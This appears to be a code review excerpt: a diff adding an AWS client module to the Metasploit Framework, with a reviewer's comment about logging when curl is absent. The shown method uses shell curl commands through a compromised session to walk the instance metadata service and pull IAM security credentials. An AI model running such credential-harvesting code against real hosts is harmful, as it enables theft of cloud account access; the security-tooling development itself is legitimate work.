lib/metasploit/framework/aws/client.rb

```diff
@@ -0,0 +1,173 @@
+
+require 'msf/core'
+require 'net/http'
+require 'openssl'
+
+module Metasploit
+  module Framework
+    module Aws
+      module Client
+        include Msf::Exploit::Remote::HttpClient
+        def register_autofilter_ports(ports=[]); end
+        def register_autofilter_hosts(ports=[]); end
+        def register_autofilter_services(services=[]); end
+
+        def metadata_creds
+          # TODO: do it for windows/generic way
+          if cmd_exec("curl --version") =~ /^curl \d/
+            url = "http://#{datastore['RHOST']}/2012-01-12/meta-data/"
+            print_status("#{peer} - looking for creds...")
+            resp = cmd_exec("curl #{url}")
+            if resp =~ /^iam.*/
+              resp = cmd_exec("curl #{url}iam/")
+              if resp =~ /^security-credentials.*/
+                resp = cmd_exec("curl #{url}iam/security-credentials/")
+                return JSON.parse(cmd_exec("curl #{url}iam/security-credentials/#{resp}"))
+              end
+            end
+          end
+          {}
```

Comment:
Might be nice to log something when curl isn't installed, which is what this line looks to be doing.